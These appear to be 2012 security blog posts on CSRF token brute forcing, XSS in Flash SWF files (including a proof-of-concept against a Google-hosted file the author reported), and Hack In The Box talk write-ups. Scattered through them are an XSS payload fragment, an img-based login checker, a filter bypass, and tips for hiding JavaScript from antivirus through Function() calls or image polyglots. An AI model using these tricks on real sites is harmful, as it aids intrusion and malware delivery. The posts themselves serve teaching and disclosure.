Chrome added these headers.

One exception is if you can include your code somewhere on the target site, e.g. XSS, which can be leveraged for CSRF.

So what about tokens? If implemented correctly they work perfectly well and will prevent CSRF attacks. However, quite often tokens are not implemented correctly allowing us to bypass the token check or possibly brute force the token. For example:

One missed token check and you have a serious CSRF vulnerability (as well as a $5000 payout :D).

Can you brute force the token?

It depends on the entropy (complexity) of the token. You need to analyse its length and character set: does it repeat, are there any static characters, are there relationships between characters? All of these factors determine its entropy (Burp Sequencer can help with the analysis). If a token has a high level of entropy there will be too many possible combinations and it will take too long to brute force. You also need to think about other, more practical issues such as latency, which could make the attack unfeasible, or server-side lock-outs. Five failed attempts and you get locked out? Brute force ain't gonna work, but denial of service will :)
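The headline entropy figure is easy to estimate once you know the character set and length (a quick sketch; note this is an upper bound - correlated or static characters reduce it, which is exactly what Sequencer's analysis looks for):

```javascript
// Upper bound on token entropy in bits: length * log2(charset size).
function tokenEntropyBits(charsetSize, tokenLength) {
  return tokenLength * Math.log2(charsetSize);
}

console.log(tokenEntropyBits(62, 5));  // ≈ 29.8 bits - brute-forceable
console.log(tokenEntropyBits(62, 32)); // ≈ 190 bits - forget it
```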

One of the best tools for brute forcing tokens is Burp Suite's Intruder, as it allows you to send a large number of requests iterating through token values until you find the correct one. It's quick and easy but requires you to have a valid cookie.

What if you don't have the target user's cookie? That's where client-side brute forcing comes in! :)


In my next post I'm going to continue with the CSRF theme and look at some interesting client-side CSRF token brute forcing examples.

Feedback and comments are always appreciated, feel free to leave a message below.



Saturday, 27 October 2012

XSS using a Flash SWF + Google XSS

Recently I've been brushing up on my XSS. One interesting example I came across used Flash SWF files to perform XSS:

This type of attack has been around for years, but I'd never played with it myself so decided to look into it further. First up, what is an SWF? From Wikipedia:

SWF is an Adobe Flash file format used for multimedia, vector graphics and ActionScript. SWF files can contain animations or applets of varying degrees of interactivity and function.

If these files can contain ActionScript, then that means there's going to be input/output and potential vulnerabilities! And for media/graphics teams and companies whose focus is producing content, security is really not going to be a priority. Good news for us, but bad news for anyone hosting SWFs.

For an introduction to exploiting SWFs check out the OWASP site:

The cool thing with these files is they can be decompiled with relative ease allowing you to perform static analysis. By locating the input variables and the functions that use these variables you can sometimes spot potential vulnerabilities.

So first up you need a decompiler. I found ASdec to be quick and effective; SWFScan is also a good choice, especially because it has a built-in vulnerability scanner which can speed things up.



Next, find yourself an SWF. The easiest way is to Google "filetype:swf", open any link and in Chrome go to Options -> Save Page As. Now you can open the SWF in ASdec, SWFScan, or both; I found ASdec easier to follow, but as already mentioned the vulnerability scanning feature of SWFScan is pretty handy. So to start off I'd run a quick scan in SWFScan (the Analyze button). If you get lucky you might find a potential XSS/CSRF. Take a look at the "Source" tab, which should have the vulnerable code highlighted.

There are two things you should look for. The first is input variables or undeclared global variables, denoted by _global, _root or _level0 - these are variables we may be able to control and potentially use to exploit the SWF. The second is interesting functions that use these variables. The OWASP site has a good list of functions to look out for:

XML.load ( 'url' )
LoadVars.load ( 'url' )
Sound.loadSound ( 'url' , isStreaming ) ( 'url' )

Next you'll need to verify how the variable is being used and if it's actually possible to take control of the function. Sometimes you won't be able to control the input value or there may be filtering in place. This is where static code analysis comes in. As each SWF is different there is no fixed method for this but I'll cover some examples below.

Example 1 - XML function with filtering (see code below)

In this first example you can see how the program accepts an XML path as input and performs some checking to prevent us from using a remote resource (such as our own malicious xml file!). The legitimate URL pointed at the site's own XML file; we want to change it to point at our own domain, however in this example it's not possible due to input validation.

The first thing to take note of is the call to our input data (path=_root.xmlPath) and its subsequent use by the XML object (myXML.load(path)). At first glance this looks quite promising. However, you'll notice that before myXML.load is performed our path variable is checked using the isDomainEnabled function...

The isDomainEnabled function first checks for the existence of www or http:// (indexOf returns -1 if something doesn't exist), then checks if our domain is included in the domain list. I've blacked it out to protect the company's identity, but the black spots are just, etc. So if we try to call our remote domain we end up stuck in the while loop, uh oh!

So how can we get around this filter? Encoding is an obvious choice or how about using just https:// instead of http:// ? :)

Example 2 - Regex filtering

Another example I encountered took in a parameter called swf_id which was later used in an ExternalInterface call. Unfortunately it was not possible to take advantage of this because of regex filtering. First the parameter was loaded: swf_id was assigned using root.loaderInfo.parameters.swf_id and, if nothing was supplied, it was left blank. A RegExp object was then used to look for any non-alphanumeric character and, if one was found, an error was thrown. This prevents us from including a URL or javascript in the swf_id parameter :(

Example 3 - ExternalInterface Call

There's a good example of how unfiltered inputs can be abused using at the below link:

This example is exploitable because of non-existent input validation of parameters sent to this function:, this.elementID, event);

Does anyone actually use vulnerable SWFs?

After doing all this analysis I thought I'd take a look at a few sites to see if they were hosting any vulnerable SWFs as this could lead to XSS/CSRF.

Google was hosting hardly any SWFs, so I checked each one in turn. One file in particular had a user interface that listed AutoDemo as its creator. Googling AutoDemo and XSS, I discovered there is a file called control.swf used by AutoDemo creations that is vulnerable to XSS. It hadn't shown up in the original search results but it was there and it was exploitable :)

There is one caveat to this story though. The file was not hosted on one of the core Google domains; it's actually hosted on the sand-boxed cache domain, "googleusercontent". So sadly it wasn't possible to steal any data using XSS. However, it would be possible to use this for phishing, and as it's based in the Google family it should still be effective at enticing users to click it.

This was the first file I found:

Here's the proof of concept XSS involving the control file."L0LZ G00GLE H4Z XSS!")//

I contacted Google about this issue and they said they didn't regard it as a serious security risk, as user data cannot be compromised and the risk of phishing is minimal. For example, there's nothing stopping someone from registering a domain called that would be far more effective for phishing. So should all vulnerabilities found in the Google cache be classified as low risk?

It's an interesting question, does the Google cache offer a unique attack vector? Maybe I'll save this for another blog post ;) If anyone has any ideas or comments feel free to leave a message below.


Saturday, 13 October 2012

Hack In The Box 2012 Kuala Lumpur Day Two

So Hack In The Box 2012 is all over. I had an awesome two days, the talks were really enjoyable and it was great talking to the other folks who attended. As promised here is the write-up of day two (with one or two pictures).

List of talks I attended:
  • Why Web Security is Fundamentally Broken by Jeremiah Grossman
  • Innovative Approaches to Exploit Delivery by Saumil Shah
  • XSS & CSRF Strike Back Powered by HTML5 by Shreeraj Shah
  • IOS panel discussion
  • Messing Up the Kids Playground: Eradicating Easy Targets by Fyodor Yarochkin
  • A Scientific (But Non Academic) Study of Malware Obfuscation Technologies by Rodrigo Rubira Branco
  • Element 1337 in the Periodic Table: Pwnium by Chris Evans 

Why Web Security is Fundamentally Broken by Jeremiah Grossman

This talk focused on the fundamental flaws present in the current security model of web technology. Nothing Jeremiah talked about required a vulnerability to exploit, all of these flaws are there by design. Jeremiah started by introducing the two main categories of browser attack:
  • Attacks to escape the browser e.g. browser exploits, java exploits, adobe exploits etc.
  • Attacks from inside the browser sandbox, e.g. XSS, CSRF, clickjacking etc.
He made the point that often there is little users can do to protect themselves and the responsibility to address these flaws lies with the website owners. Next he presented a couple of examples.

img src Login Checker
This one-liner tries to retrieve an image from a site on a different domain. If the user is logged in, Twitter or Facebook will redirect to the image, sending back an HTTP 302 message; if not, an error code will be returned. There is a module within BeEF that uses this technique to check for Gmail, Facebook and Twitter login status.

<img src="" onload="successful()" onerror="error()">

Personal Information leakage through Follows and Likes
It's surprising how much information is given away when someone follows or likes something on Twitter or Facebook. With default privacy settings it's possible for the person you follow or the page you like to view a selection of your personal information. Facebook and Twitter should really address this issue, but doing so would no doubt piss off big business, as it would prevent data mining of these sources.

Host Information Leakage
Through browser calls and javascript it's possible to find out information such as browser version, underlying OS, browser plugins, add-ons and extensions (different to plugins). It's possible to brute force their existence by using the extension URLs from the app store.

Possible Solutions
  • To fix login detection - Do not send web visitors cookie data to off-domain destinations.
  • Not possible to fix likes or follows as money-making analytics relies on these features.
  • Ban iframes or transparent iframes. Facebook, gmail and others rely on iframes!
  • Create a barrier between public and private networks filtering particular RFCs. Not possible because businesses often have fucked up internet/intranet settings.
  • Ultimately no browser is willing to fix these issues as they might lose users.
  • Instead apply a bandage through opt-in security settings deployed by individual website owners. e.g. Secure cookies, HttpOnly, x-frame-options.

There are three choices, either we:
  • Carry on as usual. 
  • Use the new .SECURE tld. 
  • Break the internet, uh oh.
As a final thought Jeremiah looked at the browser model used by mobile apps. Apps are quite often just mini versions of browsers but locked down to a particular site. This is a secure model and something that could be adopted on Desktops.

Innovative Approaches to Exploit Delivery by Saumil Shah

Saumil presented an interesting way to obfuscate javascript by encoding it within an image. He started off by covering traditional obfuscation techniques that usually rely on the eval statement to decode javascript. Although this can prevent manual analysis of code, it doesn't evade dynamic analysis and AV/IDS vendors will often flag an eval statement as suspicious! He gave a quick demo to show how easy it is to place malicious javascript in a tinyurl website and then embed it on another site or share the link through email/social networks.
Saumil then demo'ed an encoder and decoder he had built that would take javascript and convert it to a basic png and back. Neat stuff. However this still used an eval to process the image to extract and run the javascript.

He presented an easy alternative to eval:
  • Flagged by AV:  var a = eval(str);
  • Not-flagged by AV:  var a = (new Function(str))();
Next up he demonstrated how to create a file that is both an image and javascript. Wut?!?! I can't remember exactly how he did this, but if you look at the hex of a gif you will see the gif89a header followed by some width and height bytes. Apparently you can just stuff javascript after these bytes inside comment delimiters /**my javascript**/ and it will be executed. All you do is embed it in the page with the following:

<img src="a.gif">
<script src="a.gif"></script>

And this worked on all browsers. Next he presented a bmp example, where he had inserted the javascript in the alpha channel section of the image and the original image remained completely intact.

Combining these techniques he demoed two images one containing the payload another the decoding routine. It was cool seeing this in action and I can imagine it's a nightmare for AV vendors to try and catch this kind of obfuscation.

In his final demo he placed adobe reader exploit code within an image in a pdf and used it to exploit adobe reader.

This talk reminded me a lot of Thor's talk at DefCon "Socialized Data: Using Social Media as a Cyber Mule" where he demoed embedding data in video and images. At the moment I don't think this is something malware authors have really focused on just because they haven't needed to but I'm sure going into the future we'll see more of this stuff in the wild.

XSS & CSRF Strike Back Powered by HTML5 by Shreeraj Shah

I actually saw this talk at BlackHat 2012 but found Shreeraj went through his material really fast. Unfortunately it was the same this time round as well :( He essentially took us on a whistlestop tour of HTML5, the modern browser architecture and exactly where the issues lie.

Shreeraj presented a few examples, I'm only going to mention my favourites:

CSRF with XHR and CORS bypass
Before HTML5, cross-domain XHR was not possible; now pages can set CORS headers to allow it. For example, when a site sets the Access-Control-Allow-Origin header to any origin, i.e. "access-control-allow-origin: *", you can successfully make cross-domain calls. What this means is that if a user were to visit, say, legitimate site A that happened to contain malicious javascript, an attacker would be able to do CSRF or pull data from the user's legitimate site B session.

He demonstrated how a malicious attacker could modify the code of a page to use cross domain resources. For example to replace a login element on the current page with remote data:


Instead of me writing a really poor explanation I'd recommend this link for some great examples of these techniques:

Web Storage
HTML5 brings some really interesting new features, such as the ability for web sites to create SQL databases or filesystems in the browser. If the website implementing these features contains XSS, an attacker can pull all of a user's data from these resources. It's cool but unfortunately not possible cross-domain.

In Chrome you can view a site's resources by bringing up the developer console: right click the page and select Inspect Element. Under the Resources tab you will be able to see any locally stored data, including session data and cookies.

For more awesome HTML5 hacks it's worth checking out:

IOS Panel Discussion by @Musclenerd, David ‘@planetbeing’ Wang, Cyril ‘@pod2g’ Mark Dowd

I went to see the iOS6 talk on day one and found it a bit tricky to follow as I don't have a lot of experience with iOS or writing kernel exploits. Although this panel discussion focused on similar material it was more high level and not as technical as the previous talk.

Despite the aslr, heap hardening, address space protection and more added by Apple, there's no doubt these will be the guys releasing a jailbreak for the iPhone5 in the coming weeks.

Messing Up the Kids Playground: Eradicating Easy Targets by Fyodor Yarochkin

Fyodor presented a rushed and somewhat unclear talk on ways to detect/catch malware and botnet owners by analysing DNS records.

He started by giving an overview of the Crimeware as a service (CaaS) scene. He described how different groups are generally responsible for different parts of the service. Fundamentally this is a black market economy where there is competition between individuals and just like the real business world it's far more profitable to cooperate with others to get the job done. This has resulted in different groups that each specialise in either malware creation, traffic generation, infrastructure or handling stolen data and each group will sell their services to the highest bidder.

He provided an interesting example of a banner advertising agency in Russia that has managed to escape prosecution because they claimed they had been hacked and there just wasn't enough evidence to achieve a conviction.

Next, Fyodor showed two ransomware examples: one that had been installed locally through a browser exploit, and one fake Firefox update written in javascript running in the browser.

The remainder of the talk was a bit rushed. He talked a bit about how patterns in DNS can be used to detect botnets: typically the same registrar will be reused, and also the same whois information. It is also possible to automate detection of malicious domain names, but he didn't go into how to do this.

He mentioned fast-flux techniques, where malicious domains are rotated very rapidly to evade detection, and suggested how this could be done cheaply. Apparently a number of registrars offer a returns policy on domains and charge only a small cancellation fee, allowing botnet infrastructure owners to repeatedly change domains for only a small cost. He also talked about how you can try to predict the domains they will use in the future. If you guess correctly then you will get bots actually connecting to you, sweet.

A Scientific (But Non Academic) Study of Malware Obfuscation Technologies by Rodrigo Rubira Branco

I only caught the last 20 minutes of this talk and regretted not watching from the start. Rodrigo is head of malware research at Qualys and can best be described as a funny Brazilian guy. In his talk he presented an analysis of anti-debugging and obfuscation techniques used by malware.

I missed the first half of the talk where he described the various anti-debugging techniques used but I was lucky enough to catch the second half where Rodrigo explained how the presence of anti-debugging in malware can actually be used as a way to detect the malware. It's such a simple idea and I'm really surprised (as was Rodrigo) that AV vendors don't use these techniques already.

For more info -

Element 1337 in the Periodic Table: Pwnium by Chris Evans 

The final talk of the day was presented by Chris Evans who is a senior in the Google security team. He started off by handing out a big pile of cash to different researchers for their contributions. Props to Google for supporting the security community.

Chris mentioned how successful the vulnerability disclosure program has been since its launch and presented some statistics. I was surprised to see that Chrome has contained so many vulnerabilities - I had rather naively assumed Google developers were invincible! Take a look at:  each month a ton of vulnerabilities get reported.

Next he discussed Pinkie Pie's working Chrome exploit. Pinkie's exploit abused a use-after-free vulnerability in the SVG module to compromise the renderer process within Chrome, with a ROP chain to evade ASLR. To escape the Chrome sandbox and access Windows he used specific IPC messages that weren't properly restricted. In other words, no super fancy exploit was needed to escape the sandbox, just a simple call to the Chrome IPC layer. Chris was facepalming live on stage at this point. More info can be found here:

Lock-picking stand:

CTF contest:

It was an awesome two days and hopefully I'll be back next year. If anyone has any comments or questions feel free to post them below.

Pwndizzle over and out.

Thursday, 11 October 2012

Hack In The Box 2012 Kuala Lumpur Day One

Hey guys,

This is a quick write-up of my experiences at Hack In The Box 2012 in Kuala Lumpur (day one). For each talk I attended I've tried to include a summary of the main points. Sadly I forgot to take pictures so it's one massive wall of text, sorry! Will try and take some for day 2.

List of talks I attended:

  • Tracking Large Scale Botnets by Jose Nazario
  • Data Mining A Mountain of Vulnerabilities by Chris Wysopal
  • 6000 Ways And More - A 15 Year Perspective on Why Telcos Keep Getting Hacked by Philippe Langlois & Emmanuel Gadaix
  • A Short History of The JavaScript Security Arsenal by Petko Petkov
  • iOS6 Security by Mark Dowd & Tarjei Mandt
  • "I Honorably Assure You: It is Secure”: Hacking in the Far East by Paul Sebastian Ziegler

Tracking Large Scale Botnets by Jose Nazario

Jose's talk focused on the techniques that are used today to measure the size of botnets by tracking down infected machines.

The general aim of his work was to measure the number of bots, in terms of the number of infected machines/IPs/people/accounts, and to classify the bots by type, geographical region and what the bot does (financial, DoS, infrastructure impact). An interesting quote from a colleague was "it can be easy to identify and count the number of infected machines but it's impossible to know the total number of machines (clean and infected) on the internet today". This makes it difficult to really gauge the scale of the problem. He also noted that the resources of security teams are limited and should be carefully prioritized.

Next Jose talked about the actual methods used to track botnets:
  • Sinkholes - Redirect CnC traffic to your server using DNS injection, P2P injection or route redirection, and count unique IPs connecting per day. Once redirected, you can send updates and commands to the bots (e.g. a removal command), however usually this isn't done for legal reasons. Sometimes it's not possible to directly interact with the bots as they sign updates or have other protections (e.g. encryption). There are two major advantages to using sinkholes: once you have redirected CnC traffic you (i) effectively lock out the botnet herder and (ii) can find out who is infected.
  • Traffic logs - If you can monitor traffic logs botnet traffic requests often contain a unique identifier. For example in conficker there was a "q" value that acted as an identifier.
  • Darknet monitoring - Monitor traffic destined for unused IPv4 address space blocks. It is possible to detect scanning from infected machines targeting the unused IPv4 regions.
  • URL Shorteners - Short urls are commonly used to spread malware (e.g. tinyurl, It is possible to analyse the characteristics of users who have clicked known bad links. For example using url shortener you can view usage statistics of who clicked the link e.g. OS, Browser etc.
  • Direct Network Access - Possible to directly monitor network traffic, e.g. at an ISP.
  • Direct Host Access - Microsoft is in best position as it can directly interact with Windows hosts, can count incidents from Windows Defender. Data currently not publicly available.
  • Direct P2P enumeration - Crawl the botnet, asks peers who they know. Gather full list. Need to reverse protocol, can be difficult to break crypto. 
Jose noted that you can't always see all of the bots due to poor network visibility, traffic redirection by ISPs, DNS blacklists or offline hosts. It is also possible to over- or under-count the number of infected machines because of DHCP (as devices change IP the same device might appear multiple times), NAT (which can really mess up estimates, e.g. for the Blaster worm in 2003 Arbor estimated 800,000 infected machines whereas Microsoft estimated 8,000,000) and opt-out (if a user disables updates or reporting).

Data Mining A Mountain of Vulnerabilities by Chris Wysopal

Chris works for Veracode where he focuses on secure code review. He presented findings from a comprehensive study of the vulnerabilities found in 9910 commercial and government applications (using static and dynamic analysis). He had correlated the vulnerabilities with the metadata of the applications (e.g. type of application, size, origin, language used) to find meaningful statistics.
  • Most applications were internally developed (75%); 15% were commercial applications and 10% open source. 50% were built with Java, 25% with .NET.
Comparing OWASP statistics with the 9910 applications analysed:
  • SQL injection was used in 20% of all attacks when 32% apps were vulnerable.
  • XSS was used in only 10% of attacks when 68% apps were vulnerable.
  • Information leakage was used in only 3% of attacks but 66% of apps were vulnerable. 
XSS appears massively under targeted. Next, comparing languages:
  • In Java, Coldfusion, .NET and PHP applications, XSS is the most common vulnerability. 
  • However when Adobe added a language level fix for XSS this helped fix the issue somewhat. 
  • C++ applications had completely different vulnerabilities, e.g. buffer overflows and error handling issues.
  • PHP had a lot of SQL injection and directory traversal issues, way more than Java and .net.
Language choice matters a lot! Comparing how vulnerabilities have changed over time:
  • The number of XSS vulnerabilities has remained steady over the last 2 years. Indicating it's not being exploited as much as other vulnerabilities and hence not being fixed.
  • The number of SQL injection vulnerabilities has decreased over the last 2 years. Most likely due to the publicity SQL injection has received.
  • Overall 86% of applications contain at least one vulnerability from the OWASP Top 10.

Industries and business:
  • Which industries are getting their code externally tested? 
  • Finance, Software makers, Tech. 
  • Utilities is one of the worst performing. (But what about all that critical infrastructure?! Uh oh.)
  • Which industry is most secure? 
  • Finance is most secure. 
  • Surprisingly, security products themselves were the most insecure!
  • Does size of company matter?
  • No difference in number of vulnerabilities between public and private companies.
  • No difference in number of vulnerabilities by company revenue.
  • The bottom line - company size and revenue don't affect the quality of code!

Regarding vulnerabilities in mobile apps, the major differences were related to the language chosen. As Android is Java-based there is more XSS/SQLi, whereas iOS apps are written in Objective-C and so have buffer management errors and directory traversal issues not found in Java. However, iOS apps are signed so are safer overall!

Chris finally talked about software developers and how they are ultimately responsible for the quality of code. He presented a statistic that on average half of all developers don't understand security. When put like this it seems fairly obvious why there are so many security flaws in modern applications. More security awareness seems to be the answer.

6000 Ways And More - A 15 Year Perspective on Why Telcos Keep Getting Hacked by Philippe Langlois & Emmanuel Gadaix

This was an interesting talk; unfortunately I don't have a lot of experience with telco backbone infrastructure or protocols so found a lot of the presentation tricky to understand. One thing was clear though - telcos have a ton of serious security flaws.

The main issues are:
  • Operators are currently focused on availability, fraud, IT security, interception and spam.
  • There are few experts in the field of telco security.
  • The industry takes a walled garden approach and is rigid, dominated by big players.
  • It's scary how easy the attacks are, and they are happening behind closed doors.
Like a lot of other industries they try to rely on security through obscurity and have a reactive as opposed to proactive approach to security. Hopefully things will change with the buzz around cyberwar and the importance of national infrastructure.

A Short History of The JavaScript Security Arsenal by Petko Petkov

This was by far my favourite talk of the day. Petko started by giving a quick history of browser technology and common attack methodologies used today. At the moment there are two main choices: BeEF can be used for XSS/JavaScript attacks, or Metasploit can be used to target vulnerabilities within the browser itself. Both have limitations, and with browsers becoming a lot more secure new techniques are needed.

Three evil plans (attack vectors) were presented:
  • Use the victim to attack other web targets.
  • Use the victim to attack internal resources.
  • Use the victim to attack others through social networks.
  • Bonus plan - Use the victim's browser to compromise the underlying system.

He described how his tools have evolved and referenced the below specifically:

JSPortScanner -> AttackAPI -> WebSecurify Suite -> Weaponry

One of the major limitations is that it's difficult to port classic security tools from C, Ruby, etc. to JavaScript to be able to use them in the browser. Weaponry is intended as a way to address this issue. By creating a custom cross-compiler it would be possible to convert your favourite programs to JavaScript and use them directly in the browser. (At least this is what I thought he was saying.)

Petko demoed a browser extension for Chrome and Firefox that had a range of attack functionality built in. This would allow a remote attacker to use the victim's browser as a pivot. I was particularly impressed by how lightweight the extension seemed to be and how quickly it performed scans and analysed data. It really was a step up from BeEF. Oh, and the UI was really sexy.

The one area I asked Petko about was initial compromise, which is something he didn't really explain. For a malicious attacker to use these techniques the target would need to install the malicious browser extension. While not as likely to succeed as, say, BeEF, you only need to look at the prevalence of malicious apps to understand that people would be more than stupid enough to install this kind of application if packaged correctly.

Overall I was really impressed. I spoke to Petko at the end and he said that the project will be open source but is currently still under construction.

iOS6 Security by Mark Dowd & Tarjei Mandt

I was originally going to see a talk by the founders of The Pirate Bay, but they apparently got detained in Bangkok and so couldn't make it to the conference. Instead I headed over to the iOS6 talk hoping to learn something new.

This was quite a technical talk digging into the new anti-jailbreaking protections (stack cookies, ASLR, heap protections) put in place by Apple in iOS6. Having only limited experience with exploit design and next to no experience with the internals of iOS, I did struggle to follow the talk. I gotta say though how impressed I was at the way these guys picked apart iOS with such ease. With everything they understood, it was hardly surprising to see them produce such a complex jailbreak (again!). All I kept thinking was "Why hasn't Apple hired these guys?".

"I Honorably Assure You: It is Secure": Hacking in the Far East by Paul Sebastian Ziegler

In the final presentation of the day Paul talked about his experiences with IT security (and life in general) in Japan and South Korea. Having lived in Japan myself I was interested to find out how different or similar his experiences were to mine.

He started by talking about the god-like status given to white foreigners in Japan and how this can be used for social engineering. He suggested foreigners could be broken down into three categories: military, English teachers and businessmen. Out of those, the businessman commands the most respect and so is perfect for social engineering. And all that is needed is a suit; magically, once the suit is on you become immune to everything.

And in emergencies (when the suit doesn't work) just play the dumb foreigner card. Having done this myself I can confirm this is a very useful strategy!

He went on to talk about the prevalence of open wireless networks and the use of WEP in Japan, and how open networks are everywhere in South Korea. He then talked about SEED, a government alternative to SSL that is deployed everywhere in South Korea. This has a knock-on effect where users are forced to use legacy browsers, as SEED doesn't support modern ones. When migrating from Windows XP to Windows 7, users have been forced to install IE6 on Windows 7 in order to use SEED websites. IE6 use was always high in South Korea because of SEED, but recently it's actually been increasing! Crazy, eh?

Day two will be up tomorrow.